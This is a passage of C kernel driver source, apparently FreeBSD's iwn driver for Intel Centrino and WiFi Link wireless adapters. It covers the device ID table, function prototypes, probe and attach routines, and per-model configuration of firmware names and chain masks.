IWN_DID_2x00_1, "Intel(R) Centrino(R) Wireless-N 2200 BGN" }, { 0x8086, IWN_DID_2x00_2, "Intel(R) Centrino(R) Wireless-N 2200 BGN" }, /* XXX 2200D is IWN_SDID_2x00_4; there's no way to express this here! */ { 0x8086, IWN_DID_2x30_1, "Intel Centrino Wireless-N 2230" }, { 0x8086, IWN_DID_2x30_2, "Intel Centrino Wireless-N 2230" }, { 0x8086, IWN_DID_130_1, "Intel Centrino Wireless-N 130" }, { 0x8086, IWN_DID_130_2, "Intel Centrino Wireless-N 130" }, { 0x8086, IWN_DID_100_1, "Intel Centrino Wireless-N 100" }, { 0x8086, IWN_DID_100_2, "Intel Centrino Wireless-N 100" }, { 0x8086, IWN_DID_4965_1, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_6x00_1, "Intel Centrino Ultimate-N 6300" }, { 0x8086, IWN_DID_6x00_2, "Intel Centrino Advanced-N 6200" }, { 0x8086, IWN_DID_4965_2, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_4965_3, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_5x00_1, "Intel WiFi Link 5100" }, { 0x8086, IWN_DID_4965_4, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_5x00_3, "Intel Ultimate N WiFi Link 5300" }, { 0x8086, IWN_DID_5x00_4, "Intel Ultimate N WiFi Link 5300" }, { 0x8086, IWN_DID_5x00_2, "Intel WiFi Link 5100" }, { 0x8086, IWN_DID_6x00_3, "Intel Centrino Ultimate-N 6300" }, { 0x8086, IWN_DID_6x00_4, "Intel Centrino Advanced-N 6200" }, { 0x8086, IWN_DID_5x50_1, "Intel WiMAX/WiFi Link 5350" }, { 0x8086, IWN_DID_5x50_2, "Intel WiMAX/WiFi Link 5350" }, { 0x8086, IWN_DID_5x50_3, "Intel WiMAX/WiFi Link 5150" }, { 0x8086, IWN_DID_5x50_4, "Intel WiMAX/WiFi Link 5150" }, { 0x8086, IWN_DID_6035_1, "Intel Centrino Advanced 6235" }, { 0x8086, IWN_DID_6035_2, "Intel Centrino Advanced 6235" }, { 0, 0, NULL } }; static int iwn_probe(device_t); static int iwn_attach(device_t); static int iwn4965_attach(struct iwn_softc *, uint16_t); static int iwn5000_attach(struct iwn_softc *, uint16_t); static int iwn_config_specific(struct iwn_softc *, uint16_t); static void iwn_radiotap_attach(struct iwn_softc *); static void iwn_sysctlattach(struct iwn_softc *); static struct ieee80211vap *iwn_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void iwn_vap_delete(struct ieee80211vap *); static int iwn_detach(device_t); static int iwn_shutdown(device_t); static int iwn_suspend(device_t); static int iwn_resume(device_t); static int iwn_nic_lock(struct iwn_softc *); static int iwn_eeprom_lock(struct iwn_softc *); static int iwn_init_otprom(struct iwn_softc *); static int iwn_read_prom_data(struct iwn_softc *, uint32_t, void *, int); static void iwn_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int iwn_dma_contig_alloc(struct iwn_softc *, struct iwn_dma_info *, void **, bus_size_t, bus_size_t); static void iwn_dma_contig_free(struct iwn_dma_info *); static int iwn_alloc_sched(struct iwn_softc *); static void iwn_free_sched(struct iwn_softc *); static int iwn_alloc_kw(struct iwn_softc *); static void iwn_free_kw(struct iwn_softc *); static int iwn_alloc_ict(struct iwn_softc *); static void iwn_free_ict(struct iwn_softc *); static int iwn_alloc_fwmem(struct iwn_softc *); static void iwn_free_fwmem(struct iwn_softc *); static int iwn_alloc_rx_ring(struct iwn_softc *, struct iwn_rx_ring *); static void iwn_reset_rx_ring(struct iwn_softc *, struct iwn_rx_ring *); static void iwn_free_rx_ring(struct iwn_softc *, struct iwn_rx_ring *); static int iwn_alloc_tx_ring(struct iwn_softc *, struct iwn_tx_ring *, int); static void iwn_reset_tx_ring(struct iwn_softc *, struct iwn_tx_ring *); static void iwn_free_tx_ring(struct iwn_softc *, struct iwn_tx_ring *); static void iwn5000_ict_reset(struct iwn_softc *); static int iwn_read_eeprom(struct iwn_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static void iwn4965_read_eeprom(struct iwn_softc *); #ifdef IWN_DEBUG static void iwn4965_print_power_group(struct iwn_softc *, int); #endif static void iwn5000_read_eeprom(struct iwn_softc *); static uint32_t iwn_eeprom_channel_flags(struct iwn_eeprom_chan *); static void iwn_read_eeprom_band(struct iwn_softc *, int); static void iwn_read_eeprom_ht40(struct iwn_softc *, int); static void iwn_read_eeprom_channels(struct iwn_softc *, int, uint32_t); static struct iwn_eeprom_chan *iwn_find_eeprom_channel(struct iwn_softc *, struct ieee80211_channel *); static int iwn_setregdomain(struct ieee80211com *, struct ieee80211_regdomain *, int, struct ieee80211_channel[]); static void iwn_read_eeprom_enhinfo(struct iwn_softc *); static struct ieee80211_node *iwn_node_alloc(struct ieee80211vap *, const uint8_t mac[IEEE80211_ADDR_LEN]); static void iwn_newassoc(struct ieee80211_node *, int); static int iwn_media_change(struct ifnet *); static int iwn_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void iwn_calib_timeout(void *); static void iwn_rx_phy(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_rx_done(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_rx_compressed_ba(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn5000_rx_calib_results(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_rx_statistics(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn4965_tx_done(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn5000_tx_done(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_tx_done(struct iwn_softc *, struct iwn_rx_desc *, int, uint8_t); static void iwn_ampdu_tx_done(struct iwn_softc *, int, int, int, void *); static void iwn_cmd_done(struct iwn_softc *, struct iwn_rx_desc *); static void iwn_notif_intr(struct iwn_softc *); static void iwn_wakeup_intr(struct iwn_softc *); static void iwn_rftoggle_intr(struct iwn_softc *); static void iwn_fatal_intr(struct iwn_softc *); static void iwn_intr(void *); static void iwn4965_update_sched(struct iwn_softc *, int, int, uint8_t, uint16_t); static void iwn5000_update_sched(struct iwn_softc *, int, int, uint8_t, uint16_t); #ifdef notyet static void iwn5000_reset_sched(struct iwn_softc *, int, int); #endif static int iwn_tx_data(struct iwn_softc *, struct mbuf *, struct ieee80211_node *); static int iwn_tx_data_raw(struct iwn_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *params); static int iwn_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void iwn_start(struct ifnet *); static void iwn_start_locked(struct ifnet *); static void iwn_watchdog(void *); static int iwn_ioctl(struct ifnet *, u_long, caddr_t); static int iwn_cmd(struct iwn_softc *, int, const void *, int, int); static int iwn4965_add_node(struct iwn_softc *, struct iwn_node_info *, int); static int iwn5000_add_node(struct iwn_softc *, struct iwn_node_info *, int); static int iwn_set_link_quality(struct iwn_softc *, struct ieee80211_node *); static int iwn_add_broadcast_node(struct iwn_softc *, int); static int iwn_updateedca(struct ieee80211com *); static void iwn_update_mcast(struct ifnet *); static void iwn_set_led(struct iwn_softc *, uint8_t, uint8_t, uint8_t); static int iwn_set_critical_temp(struct iwn_softc *); static int iwn_set_timing(struct iwn_softc *, struct ieee80211_node *); static void iwn4965_power_calibration(struct iwn_softc *, int); static int iwn4965_set_txpower(struct iwn_softc *, struct ieee80211_channel *, int); static int iwn5000_set_txpower(struct iwn_softc *, struct ieee80211_channel *, int); static int iwn4965_get_rssi(struct iwn_softc *, struct iwn_rx_stat *); static int iwn5000_get_rssi(struct iwn_softc *, struct iwn_rx_stat *); static int iwn_get_noise(const struct iwn_rx_general_stats *); static int iwn4965_get_temperature(struct iwn_softc *); static int iwn5000_get_temperature(struct iwn_softc *); static int iwn_init_sensitivity(struct iwn_softc *); static void iwn_collect_noise(struct iwn_softc *, const struct iwn_rx_general_stats *); static int iwn4965_init_gains(struct iwn_softc *); static int iwn5000_init_gains(struct iwn_softc *); static int iwn4965_set_gains(struct iwn_softc *); static int iwn5000_set_gains(struct iwn_softc *); static void iwn_tune_sensitivity(struct iwn_softc *, const struct iwn_rx_stats *); static void iwn_save_stats_counters(struct iwn_softc *, const struct iwn_stats *); static int iwn_send_sensitivity(struct iwn_softc *); static void iwn_check_rx_recovery(struct iwn_softc *, struct iwn_stats *); static int iwn_set_pslevel(struct iwn_softc *, int, int, int); static int iwn_send_btcoex(struct iwn_softc *); static int iwn_send_advanced_btcoex(struct iwn_softc *); static int iwn5000_runtime_calib(struct iwn_softc *); static int iwn_config(struct iwn_softc *); static uint8_t *ieee80211_add_ssid(uint8_t *, const uint8_t *, u_int); static int iwn_scan(struct iwn_softc *, struct ieee80211vap *, struct ieee80211_scan_state *, struct ieee80211_channel *); static int iwn_auth(struct iwn_softc *, struct ieee80211vap *vap); static int iwn_run(struct iwn_softc *, struct ieee80211vap *vap); static int iwn_ampdu_rx_start(struct ieee80211_node *, struct ieee80211_rx_ampdu *, int, int, int); static void iwn_ampdu_rx_stop(struct ieee80211_node *, struct ieee80211_rx_ampdu *); static int iwn_addba_request(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int, int, int); static int iwn_addba_response(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int, int, int); static int iwn_ampdu_tx_start(struct ieee80211com *, struct ieee80211_node *, uint8_t); static void iwn_ampdu_tx_stop(struct ieee80211_node *, struct ieee80211_tx_ampdu *); static void iwn4965_ampdu_tx_start(struct iwn_softc *, struct ieee80211_node *, int, uint8_t, uint16_t); static void iwn4965_ampdu_tx_stop(struct iwn_softc *, int, uint8_t, uint16_t); static void iwn5000_ampdu_tx_start(struct iwn_softc *, struct ieee80211_node *, int, uint8_t, uint16_t); static void iwn5000_ampdu_tx_stop(struct iwn_softc *, int, uint8_t, uint16_t); static int iwn5000_query_calibration(struct iwn_softc *); static int iwn5000_send_calibration(struct iwn_softc *); static int iwn5000_send_wimax_coex(struct iwn_softc *); static int iwn5000_crystal_calib(struct iwn_softc *); static int iwn5000_temp_offset_calib(struct iwn_softc *); static int iwn5000_temp_offset_calibv2(struct iwn_softc *); static int iwn4965_post_alive(struct iwn_softc *); static int iwn5000_post_alive(struct iwn_softc *); static int iwn4965_load_bootcode(struct iwn_softc *, const uint8_t *, int); static int iwn4965_load_firmware(struct iwn_softc *); static int iwn5000_load_firmware_section(struct iwn_softc *, uint32_t, const uint8_t *, int); static int iwn5000_load_firmware(struct iwn_softc *); static int iwn_read_firmware_leg(struct iwn_softc *, struct iwn_fw_info *); static int iwn_read_firmware_tlv(struct iwn_softc *, struct iwn_fw_info *, uint16_t); static int iwn_read_firmware(struct iwn_softc *); static int iwn_clock_wait(struct iwn_softc *); static int iwn_apm_init(struct iwn_softc *); static void iwn_apm_stop_master(struct iwn_softc *); static void iwn_apm_stop(struct iwn_softc *); static int iwn4965_nic_config(struct iwn_softc *); static int iwn5000_nic_config(struct iwn_softc *); static int iwn_hw_prepare(struct iwn_softc *); static int iwn_hw_init(struct iwn_softc *); static void iwn_hw_stop(struct iwn_softc *); static void iwn_radio_on(void *, int); static void iwn_radio_off(void *, int); static void iwn_init_locked(struct iwn_softc *); static void iwn_init(void *); static void iwn_stop_locked(struct iwn_softc *); static void iwn_stop(struct iwn_softc *); static void iwn_scan_start(struct ieee80211com *); static void iwn_scan_end(struct ieee80211com *); static void iwn_set_channel(struct ieee80211com *); static void iwn_scan_curchan(struct ieee80211_scan_state *, unsigned long); static void iwn_scan_mindwell(struct ieee80211_scan_state *); static void iwn_hw_reset(void *, int); #ifdef IWN_DEBUG static char *iwn_get_csr_string(int); static void iwn_debug_register(struct iwn_softc *); #endif static device_method_t iwn_methods[] = { /* Device interface */ DEVMETHOD(device_probe, iwn_probe), DEVMETHOD(device_attach, iwn_attach), DEVMETHOD(device_detach, iwn_detach), DEVMETHOD(device_shutdown, iwn_shutdown), DEVMETHOD(device_suspend, iwn_suspend), DEVMETHOD(device_resume, iwn_resume), DEVMETHOD_END }; static driver_t iwn_driver = { "iwn", iwn_methods, sizeof(struct iwn_softc) }; static devclass_t iwn_devclass; DRIVER_MODULE(iwn, pci, iwn_driver, iwn_devclass, NULL, NULL); MODULE_VERSION(iwn, 1); MODULE_DEPEND(iwn, firmware, 1, 1, 1); MODULE_DEPEND(iwn, pci, 1, 1, 1); MODULE_DEPEND(iwn, wlan, 1, 1, 1); static int iwn_probe(device_t dev) { const struct iwn_ident *ident; for (ident = iwn_ident_table; ident->name != NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } static int iwn_attach(device_t dev) { struct iwn_softc *sc = (struct iwn_softc *)device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; int i, error, rid; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; #ifdef IWN_DEBUG error = resource_int_value(device_get_name(sc->sc_dev), device_get_unit(sc->sc_dev), "debug", &(sc->sc_debug)); if (error != 0) sc->sc_debug = 0; #else sc->sc_debug = 0; #endif DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: begin\n",__func__); /* * Get the offset of the PCI Express Capability Structure in PCI * Configuration Space. */ error = pci_find_cap(dev, PCIY_EXPRESS, &sc->sc_cap_off); if (error != 0) { device_printf(dev, "PCIe capability structure not found!\n"); return error; } /* Clear device-specific "PCI retry timeout" register (41h). */ pci_write_config(dev, 0x41, 0, 1); /* Enable bus-mastering. */ pci_enable_busmaster(dev); rid = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &rid, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "can't map mem space\n"); error = ENOMEM; return error; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); i = 1; rid = 0; if (pci_alloc_msi(dev, &i) == 0) rid = 1; /* Install interrupt handler. */ sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &rid, RF_ACTIVE | (rid != 0 ? 0 : RF_SHAREABLE)); if (sc->irq == NULL) { device_printf(dev, "can't map interrupt\n"); error = ENOMEM; goto fail; } IWN_LOCK_INIT(sc); /* Read hardware revision and attach. */ sc->hw_type = (IWN_READ(sc, IWN_HW_REV) >> IWN_HW_REV_TYPE_SHIFT) & IWN_HW_REV_TYPE_MASK; sc->subdevice_id = pci_get_subdevice(dev); /* * 4965 versus 5000 and later have different methods. * Let's set those up first. */ if (sc->hw_type == IWN_HW_REV_TYPE_4965) error = iwn4965_attach(sc, pci_get_device(dev)); else error = iwn5000_attach(sc, pci_get_device(dev)); if (error != 0) { device_printf(dev, "could not attach device, error %d\n", error); goto fail; } /* * Next, let's setup the various parameters of each NIC. */ error = iwn_config_specific(sc, pci_get_device(dev)); if (error != 0) { device_printf(dev, "could not attach device, error %d\n", error); goto fail; } if ((error = iwn_hw_prepare(sc)) != 0) { device_printf(dev, "hardware not ready, error %d\n", error); goto fail; } /* Allocate DMA memory for firmware transfers. */ if ((error = iwn_alloc_fwmem(sc)) != 0) { device_printf(dev, "could not allocate memory for firmware, error %d\n", error); goto fail; } /* Allocate "Keep Warm" page. */ if ((error = iwn_alloc_kw(sc)) != 0) { device_printf(dev, "could not allocate keep warm page, error %d\n", error); goto fail; } /* Allocate ICT table for 5000 Series. */ if (sc->hw_type != IWN_HW_REV_TYPE_4965 && (error = iwn_alloc_ict(sc)) != 0) { device_printf(dev, "could not allocate ICT table, error %d\n", error); goto fail; } /* Allocate TX scheduler "rings". */ if ((error = iwn_alloc_sched(sc)) != 0) { device_printf(dev, "could not allocate TX scheduler rings, error %d\n", error); goto fail; } /* Allocate TX rings (16 on 4965AGN, 20 on >=5000). */ for (i = 0; i < sc->ntxqs; i++) { if ((error = iwn_alloc_tx_ring(sc, &sc->txq[i], i)) != 0) { device_printf(dev, "could not allocate TX ring %d, error %d\n", i, error); goto fail; } } /* Allocate RX ring. */ if ((error = iwn_alloc_rx_ring(sc, &sc->rxq)) != 0) { device_printf(dev, "could not allocate RX ring, error %d\n", error); goto fail; } /* Clear pending interrupts. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not allocate ifnet structure\n"); goto fail; } ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* Set device capabilities. */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_BGSCAN /* background scanning */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA | IEEE80211_C_SHPREAMBLE /* short preamble supported */ #if 0 | IEEE80211_C_IBSS /* ibss/adhoc mode */ #endif | IEEE80211_C_WME /* WME */ | IEEE80211_C_PMGT /* Station-side power mgmt */ ; /* Read MAC address, channels, etc from EEPROM. */ if ((error = iwn_read_eeprom(sc, macaddr)) != 0) { device_printf(dev, "could not read EEPROM, error %d\n", error); goto fail; } /* Count the number of available chains. */ sc->ntxchains = ((sc->txchainmask >> 2) & 1) + ((sc->txchainmask >> 1) & 1) + ((sc->txchainmask >> 0) & 1); sc->nrxchains = ((sc->rxchainmask >> 2) & 1) + ((sc->rxchainmask >> 1) & 1) + ((sc->rxchainmask >> 0) & 1); if (bootverbose) { device_printf(dev, "MIMO %dT%dR, %.4s, address %6D\n", sc->ntxchains, sc->nrxchains, sc->eeprom_domain, macaddr, ":"); } if (sc->sc_flags & IWN_FLAG_HAS_11N) { ic->ic_rxstream = sc->nrxchains; ic->ic_txstream = sc->ntxchains; /* * The NICs we currently support cap out at 2x2 support * separate from the chains being used. * * This is a total hack to work around that until some * per-device method is implemented to return the * actual stream support. * * XXX Note: the 5350 is a 3x3 device; so we shouldn't * cap this! But, anything that touches rates in the * driver needs to be audited first before 3x3 is enabled. */ if (ic->ic_rxstream > 2) ic->ic_rxstream = 2; if (ic->ic_txstream > 2) ic->ic_txstream = 2; ic->ic_htcaps = IEEE80211_HTCAP_SMPS_OFF /* SMPS mode disabled */ | IEEE80211_HTCAP_SHORTGI20 /* short GI in 20MHz */ | IEEE80211_HTCAP_CHWIDTH40 /* 40MHz channel width*/ | IEEE80211_HTCAP_SHORTGI40 /* short GI in 40MHz */ #ifdef notyet | IEEE80211_HTCAP_GREENFIELD #if IWN_RBUF_SIZE == 8192 | IEEE80211_HTCAP_MAXAMSDU_7935 /* max A-MSDU length */ #else | IEEE80211_HTCAP_MAXAMSDU_3839 /* max A-MSDU length */ #endif #endif /* s/w capabilities */ | IEEE80211_HTC_HT /* HT operation */ | IEEE80211_HTC_AMPDU /* tx A-MPDU */ #ifdef notyet | IEEE80211_HTC_AMSDU /* tx A-MSDU */ #endif ; } if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = iwn_init; ifp->if_ioctl = iwn_ioctl; ifp->if_start = iwn_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ieee80211_ifattach(ic, macaddr); ic->ic_vap_create = iwn_vap_create; ic->ic_vap_delete = iwn_vap_delete; ic->ic_raw_xmit = iwn_raw_xmit; ic->ic_node_alloc = iwn_node_alloc; sc->sc_ampdu_rx_start = ic->ic_ampdu_rx_start; ic->ic_ampdu_rx_start = iwn_ampdu_rx_start; sc->sc_ampdu_rx_stop = ic->ic_ampdu_rx_stop; ic->ic_ampdu_rx_stop = iwn_ampdu_rx_stop; sc->sc_addba_request = ic->ic_addba_request; ic->ic_addba_request = iwn_addba_request; sc->sc_addba_response = ic->ic_addba_response; ic->ic_addba_response = iwn_addba_response; sc->sc_addba_stop = ic->ic_addba_stop; ic->ic_addba_stop = iwn_ampdu_tx_stop; ic->ic_newassoc = iwn_newassoc; ic->ic_wme.wme_update = iwn_updateedca; ic->ic_update_mcast = iwn_update_mcast; ic->ic_scan_start = iwn_scan_start; ic->ic_scan_end = iwn_scan_end; ic->ic_set_channel = iwn_set_channel; ic->ic_scan_curchan = iwn_scan_curchan; ic->ic_scan_mindwell = iwn_scan_mindwell; ic->ic_setregdomain = iwn_setregdomain; iwn_radiotap_attach(sc); callout_init_mtx(&sc->calib_to, &sc->sc_mtx, 0); callout_init_mtx(&sc->watchdog_to, &sc->sc_mtx, 0); TASK_INIT(&sc->sc_reinit_task, 0, iwn_hw_reset, sc); TASK_INIT(&sc->sc_radioon_task, 0, iwn_radio_on, sc); TASK_INIT(&sc->sc_radiooff_task, 0, iwn_radio_off, sc); iwn_sysctlattach(sc); /* * Hook our interrupt after all initialization is complete. */ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, iwn_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "can't establish interrupt, error %d\n", error); goto fail; } if (bootverbose) ieee80211_announce(ic); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; fail: iwn_detach(dev); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end in error\n",__func__); return error; } /* * Define specific configuration based on device id and subdevice id * pid : PCI device id */ static int iwn_config_specific(struct iwn_softc *sc, uint16_t pid) { switch (pid) { /* 4965 series */ case IWN_DID_4965_1: case IWN_DID_4965_2: case IWN_DID_4965_3: case IWN_DID_4965_4: sc->base_params = &iwn4965_base_params; sc->limits = &iwn4965_sensitivity_limits; sc->fwname = "iwn4965fw"; /* Override chains masks, ROM is known to be broken. */ sc->txchainmask = IWN_ANT_AB; sc->rxchainmask = IWN_ANT_ABC; /* Enable normal btcoex */ sc->sc_flags |= IWN_FLAG_BTCOEX; break; /* 1000 Series */ case IWN_DID_1000_1: case IWN_DID_1000_2: switch(sc->subdevice_id) { case IWN_SDID_1000_1: case IWN_SDID_1000_2: case IWN_SDID_1000_3: case IWN_SDID_1000_4: case IWN_SDID_1000_5: case IWN_SDID_1000_6: case IWN_SDID_1000_7: case IWN_SDID_1000_8: case IWN_SDID_1000_9: case IWN_SDID_1000_10: case IWN_SDID_1000_11: case IWN_SDID_1000_12: sc->limits = &iwn1000_sensitivity_limits; sc->base_params = &iwn1000_base_params; sc->fwname = "iwn1000fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x00 Series */ case IWN_DID_6x00_2: case IWN_DID_6x00_4: case IWN_DID_6x00_1: case IWN_DID_6x00_3: sc->fwname = "iwn6000fw"; sc->limits = &iwn6000_sensitivity_limits; switch(sc->subdevice_id) { case IWN_SDID_6x00_1: case IWN_SDID_6x00_2: case IWN_SDID_6x00_8: //iwl6000_3agn_cfg sc->base_params = &iwn_6000_base_params; break; case IWN_SDID_6x00_3: case IWN_SDID_6x00_6: case IWN_SDID_6x00_9: ////iwl6000i_2agn case IWN_SDID_6x00_4: case IWN_SDID_6x00_7: case IWN_SDID_6x00_10: //iwl6000i_2abg_cfg case IWN_SDID_6x00_5: //iwl6000i_2bg_cfg sc->base_params = &iwn_6000i_base_params; sc->sc_flags |= IWN_FLAG_INTERNAL_PA; sc->txchainmask = IWN_ANT_BC; sc->rxchainmask = IWN_ANT_BC; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x05 Series */ case IWN_DID_6x05_1: case IWN_DID_6x05_2: switch(sc->subdevice_id) { case IWN_SDID_6x05_1: case IWN_SDID_6x05_4: case IWN_SDID_6x05_6: //iwl6005_2agn_cfg case IWN_SDID_6x05_2: case IWN_SDID_6x05_5: case IWN_SDID_6x05_7: //iwl6005_2abg_cfg case IWN_SDID_6x05_3: //iwl6005_2bg_cfg case IWN_SDID_6x05_8: case IWN_SDID_6x05_9: //iwl6005_2agn_sff_cfg case IWN_SDID_6x05_10: //iwl6005_2agn_d_cfg case IWN_SDID_6x05_11: //iwl6005_2agn_mow1_cfg case IWN_SDID_6x05_12: //iwl6005_2agn_mow2_cfg sc->fwname = "iwn6000g2afw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6000g2_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x35 Series */ case IWN_DID_6035_1: case IWN_DID_6035_2: switch(sc->subdevice_id) { case IWN_SDID_6035_1: case IWN_SDID_6035_2: case IWN_SDID_6035_3: case IWN_SDID_6035_4: sc->fwname = "iwn6000g2bfw"; sc->limits = &iwn6235_sensitivity_limits; sc->base_params = &iwn_6235_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6x50 WiFi/WiMax Series */ case IWN_DID_6050_1: case IWN_DID_6050_2: switch(sc->subdevice_id) { case IWN_SDID_6050_1: case IWN_SDID_6050_3: case IWN_SDID_6050_5: //iwl6050_2agn_cfg case IWN_SDID_6050_2: case IWN_SDID_6050_4: case IWN_SDID_6050_6: //iwl6050_2abg_cfg sc->fwname = "iwn6050fw"; sc->txchainmask = IWN_ANT_AB; sc->rxchainmask = IWN_ANT_AB; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6050_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6150 WiFi/WiMax Series */ case IWN_DID_6150_1: case IWN_DID_6150_2: switch(sc->subdevice_id) { case IWN_SDID_6150_1: case IWN_SDID_6150_3: case IWN_SDID_6150_5: // iwl6150_bgn_cfg case IWN_SDID_6150_2: case IWN_SDID_6150_4: case IWN_SDID_6150_6: //iwl6150_bg_cfg sc->fwname = "iwn6050fw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6150_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 6030 Series and 1030 Series */ case IWN_DID_x030_1: case IWN_DID_x030_2: case IWN_DID_x030_3: case IWN_DID_x030_4: switch(sc->subdevice_id) { case IWN_SDID_x030_1: case IWN_SDID_x030_3: case IWN_SDID_x030_5: // iwl1030_bgn_cfg case IWN_SDID_x030_2: case IWN_SDID_x030_4: case IWN_SDID_x030_6: //iwl1030_bg_cfg case IWN_SDID_x030_7: case IWN_SDID_x030_10: case IWN_SDID_x030_14: //iwl6030_2agn_cfg case IWN_SDID_x030_8: case IWN_SDID_x030_11: case IWN_SDID_x030_15: // iwl6030_2bgn_cfg case IWN_SDID_x030_9: case IWN_SDID_x030_12: case IWN_SDID_x030_16: // iwl6030_2abg_cfg case IWN_SDID_x030_13: //iwl6030_2bg_cfg sc->fwname = "iwn6000g2bfw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6000g2b_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 130 Series WiFi */ /* XXX: This series will need adjustment for rate. * see rx_with_siso_diversity in linux kernel */ case IWN_DID_130_1: case IWN_DID_130_2: switch(sc->subdevice_id) { case IWN_SDID_130_1: case IWN_SDID_130_3: case IWN_SDID_130_5: //iwl130_bgn_cfg case IWN_SDID_130_2: case IWN_SDID_130_4: case IWN_SDID_130_6: //iwl130_bg_cfg sc->fwname = "iwn6000g2bfw"; sc->limits = &iwn6000_sensitivity_limits; sc->base_params = &iwn_6000g2b_base_params; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 100 Series WiFi */ case IWN_DID_100_1: case IWN_DID_100_2: switch(sc->subdevice_id) { case IWN_SDID_100_1: case IWN_SDID_100_2: case IWN_SDID_100_3: case IWN_SDID_100_4: case IWN_SDID_100_5: case IWN_SDID_100_6: sc->limits = &iwn1000_sensitivity_limits; sc->base_params = &iwn1000_base_params; sc->fwname = "iwn100fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported (subdevice)\n", pid, sc->subdevice_id,sc->hw_type); return ENOTSUP; } break; /* 2x00 Series */ case IWN_DID_2x00_1: case IWN_DID_2x00_2: switch(sc->subdevice_id) { case IWN_SDID_2x00_1: case IWN_SDID_2x00_2: case IWN_SDID_2x00_3: //iwl2000_2bgn_cfg case IWN_SDID_2x00_4: //iwl2000_2bgn_d_cfg sc->limits = &iwn2030_sensitivity_limits; sc->base_params = &iwn2000_base_params; sc->fwname = "iwn2000fw"; break; default: device_printf(sc->sc_dev, "adapter type id : 0x%04x sub id :" "0x%04x rev %d not supported 